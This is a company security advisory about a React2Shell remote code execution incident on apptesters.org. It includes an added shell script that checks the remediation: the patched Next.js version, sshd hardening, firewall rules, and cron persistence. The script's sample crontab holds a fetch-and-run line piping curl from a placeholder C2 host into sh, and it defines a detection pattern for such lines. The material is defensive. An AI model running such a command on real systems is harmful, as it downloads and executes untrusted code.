Advisory: Incident contained

Security Advisory: React2Shell (CVE-2025-55182 / CVE-2025-66478)

This page explains how the React2Shell vulnerability affected apptesters.org, what we did to secure our systems, and what it means for your data.

First published: 12 December 2025 (IST)
Status: Patched & monitored
CVE IDs: CVE-2025-55182 (React), CVE-2025-66478 (Next.js)

Impact to customer data

No evidence of customer data access

This server does not store your account details, orders, payment information, or certificates. Those live on our Google & Amazon cloud backends, which were not compromised.


What happened

Remote code execution on web server

A critical React Server Components vulnerability was exploited against our public Next.js app. Attackers were able to run limited commands inside a restricted container on the web server.

Simplified request flow

Attacker request -> Next.js app -> Node service

Current state

Vulnerability patched, C2 blocked, access hardened

We upgraded to patched versions, removed any leftover malicious artifacts, blocked the attack infrastructure at the firewall, tightened SSH settings, and added health monitoring.

Defence layers now in place

Patched app, firewall blocks, SSH hardening

What is React2Shell (CVE-2025-55182 / CVE-2025-66478)?

React2Shell is a critical remote code execution vulnerability in React Server Components (RSC). It is tracked as CVE-2025-55182 in React itself and CVE-2025-66478 for its downstream impact on Next.js applications using the App Router.

In vulnerable versions, the RSC protocol could be tricked into unsafe deserialization of attacker-controlled data. That data could then directly invoke server-side APIs and run arbitrary shell commands via Node.js:

  • An attacker sends a crafted HTTP request to a vulnerable endpoint.
  • The server processes the malicious RSC payload and ends up running arbitrary commands inside the Node.js process.
  • Those commands run with the same privileges as the web application on that server.

The vulnerability was rated CVSS 10.0 (critical) and has been widely exploited in the wild against unpatched applications.

What happened on apptesters.org?

Our main website apptesters.org runs on Next.js with React Server Components. During the global React2Shell exploitation wave, attackers triggered remote code execution on this production web server.

From log and process analysis, we observed:

  • Exploit traffic invoked Node.js commands attempting to download and run generic botnet / malware payloads.
  • Multiple attempts were made to fetch binaries and scripts from external command-and-control servers and to establish persistence.
  • These payloads mostly failed because the application was running in a restricted container with no long-lived shell, no global package manager, and strict resource limits.
  • No evidence was found of data exfiltration, credential harvesting, or lateral movement from this host to our cloud backends.

What we did to secure our systems

Our response focused on patching the vulnerability, removing any potential malware, and hardening access to reduce the blast radius of similar issues in the future.

1. Patched the application stack

Updated Next.js to 15.3.6 using the official fix-react2shell-next tool, ensuring we use the hardened React Server Components implementation.

2. Removed suspicious artifacts

Searched for known miner / botnet indicators, removed any unknown binaries or scripts, and ensured no malicious services or cron jobs remained.

3. Hardened SSH access

Restricted SSH logins to key-based root access only, reviewed authorized keys, and tightened configuration to reduce remote entry points.

4. Added network-level blocks

Added explicit firewall rules to block communication with known malicious command-and-control IPs associated with this campaign.

5. Improved monitoring & health checks

Enabled lightweight health monitoring on key processes and added safeguards to detect abnormal resource usage on the server.

6. Documented & will iterate

Prepared this public incident summary and a more detailed internal report so we can continue improving our security posture.
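The script below is an added example, not apptesters.org's own tooling, showing how the remediation steps 1 to 4 above can be re-verified after the fact on a host like this one: it reads the installed next/package.json and checks it against the fixed version named in this advisory, scans a crontab dump for entries that fetch and pipe remote code into a shell, checks that sshd_config allows key-based logins only, and turns a blocklist into firewall rules. Every path is an argument (assumed: node_modules/next/package.json, /etc/ssh/sshd_config, a crontab dump, a one-address-per-line blocklist), the only fixed-version threshold it knows is the 15.3.6 named in step 1, and the sample inputs at the bottom are constructed with placeholder addresses rather than real indicators.

```sh
#!/bin/sh
# Post-remediation checks for steps 1 to 4 (added example, not apptesters.org
# tooling). Everything is read from file paths passed in, so the same functions
# run against the constructed samples below or against a real host's files.

# ---- step 1: is the installed Next.js on a fixed release line? ---------------
# Minimum fixed version per major.minor line. Only the line named in this
# advisory is filled in; add the other lines from the upstream advisory.
PATCHED_MINIMUMS="15.3=15.3.6"

version_ge() {
  # 0 when dotted version $1 >= $2, comparing numerically so 15.10.0 > 15.3.6
  awk -v a="$1" -v b="$2" 'BEGIN {
    n = split(a, x, "."); m = split(b, y, "."); k = (n > m) ? n : m
    for (i = 1; i <= k; i++) {
      p = (i <= n) ? x[i] + 0 : 0; q = (i <= m) ? y[i] + 0 : 0
      if (p > q) exit 0
      if (p < q) exit 1
    }
    exit 0 }'
}

next_version_from() {
  # first top-level "version" field of a package.json (node_modules/next/package.json)
  sed -n 's/^[[:space:]]*"version":[[:space:]]*"\([^"]*\)".*/\1/p' "$1" | head -n 1
}

minimum_for_line() {
  # prints the fixed minimum for the major.minor line of version $1; fails if unknown
  line=$(printf '%s' "$1" | cut -d. -f1,2)
  for entry in $PATCHED_MINIMUMS; do
    case "$entry" in
      "$line="*) printf '%s\n' "${entry#*=}"; return 0 ;;
    esac
  done
  return 1
}

check_next_patched() {
  # $1 = path to the installed next/package.json; unknown release lines fail closed
  v=$(next_version_from "$1")
  [ -n "$v" ] || return 1
  min=$(minimum_for_line "$v") || return 1
  version_ge "$v" "$min"
}

# ---- step 2: cron persistence that fetches and executes remote code ----------
suspicious_cron_lines() {
  # prints crontab entries that pipe curl/wget output straight into a shell
  grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh' "$1" || true
}

# ---- step 3: sshd_config restricted to key-based logins ----------------------
sshd_option() {
  # sshd honours the first occurrence of a keyword, so this does too ($1 = file, $2 = keyword)
  awk -v k="$2" 'tolower($1) == tolower(k) { print $2; exit }' "$1"
}

check_sshd_hardened() {
  [ "$(sshd_option "$1" PasswordAuthentication)" = "no" ] &&
  [ "$(sshd_option "$1" PermitRootLogin)" = "prohibit-password" ]
}

# ---- step 4: firewall rules from a C2 blocklist ------------------------------
firewall_rules_for() {
  # $1 = one IPv4 address per line ('#' comments allowed); prints, never runs, the rules
  grep -Ev '^[[:space:]]*(#|$)' "$1" | while read -r ip; do
    case "$ip" in *[!0-9.]*) continue ;; esac   # skip anything that is not a dotted quad
    printf 'iptables -I INPUT -s %s -j DROP\n' "$ip"
    printf 'iptables -I OUTPUT -d %s -j DROP\n' "$ip"
  done
}

# ---- constructed sample inputs (placeholder values, not real indicators) -----
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
mkdir -p "$SAMPLE_DIR/patched" "$SAMPLE_DIR/vulnerable"
printf '{\n  "name": "next",\n  "version": "15.3.6"\n}\n' > "$SAMPLE_DIR/patched/package.json"
printf '{\n  "name": "next",\n  "version": "15.3.2"\n}\n' > "$SAMPLE_DIR/vulnerable/package.json"
printf 'PermitRootLogin prohibit-password\nPasswordAuthentication no\n' > "$SAMPLE_DIR/sshd_config.hardened"
printf '#PermitRootLogin prohibit-password\nPermitRootLogin yes\nPasswordAuthentication yes\n' > "$SAMPLE_DIR/sshd_config.weak"
printf '0 3 * * * /usr/local/bin/backup.sh\n*/5 * * * * curl -s http://c2.example.invalid/x.sh | sh\n' > "$SAMPLE_DIR/crontab"
printf '# placeholder addresses from TEST-NET ranges\n192.0.2.10\n198.51.100.77\n' > "$SAMPLE_DIR/c2-blocklist.txt"

report() {
  # $1 = label, rest = the check to run; prints PASS/FAIL without aborting the script
  label=$1; shift
  if "$@"; then echo "PASS  $label"; else echo "FAIL  $label"; fi
}

report "next.js patched (sample 15.3.6)" check_next_patched "$SAMPLE_DIR/patched/package.json"
report "next.js patched (sample 15.3.2)" check_next_patched "$SAMPLE_DIR/vulnerable/package.json"
report "sshd hardened (sample)"          check_sshd_hardened "$SAMPLE_DIR/sshd_config.hardened"
report "sshd hardened (weak sample)"     check_sshd_hardened "$SAMPLE_DIR/sshd_config.weak"
echo "suspicious cron entries:"; suspicious_cron_lines "$SAMPLE_DIR/crontab"
echo "firewall rules to apply:";  firewall_rules_for "$SAMPLE_DIR/c2-blocklist.txt"
```

On a live host, point the functions at the real files instead of the samples. Two caveats: the version check fails closed for any release line not in PATCHED_MINIMUMS, so the table has to be extended from the upstream advisory before it can say anything about other lines; and the sshd check reads the main config file only, ignoring Match blocks and Include drop-ins, so compare its result with the effective configuration printed by `sshd -T`. The firewall function deliberately prints the rules rather than applying them, so they can be reviewed before they go in.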

What this means for your data

The most important question is whether this incident affected your data. Based on our architecture and investigation:

Where your data actually lives

  • Customer accounts, orders, device identifiers (UDIDs), and operational data are stored on our managed cloud backends (Google / Amazon services).
  • This web server hosts only the Next.js frontend and API layer that talks to those backends; it does not store full copies of that data on disk.
  • We found no evidence that attackers accessed those cloud systems or any customer records.

In short: this incident affected the UI server environment, not the databases where your information lives.

Staying ahead of security issues

We treat incidents seriously, even when customer data is not exposed. This advisory is part of our commitment to being clear about what happened and how we respond.
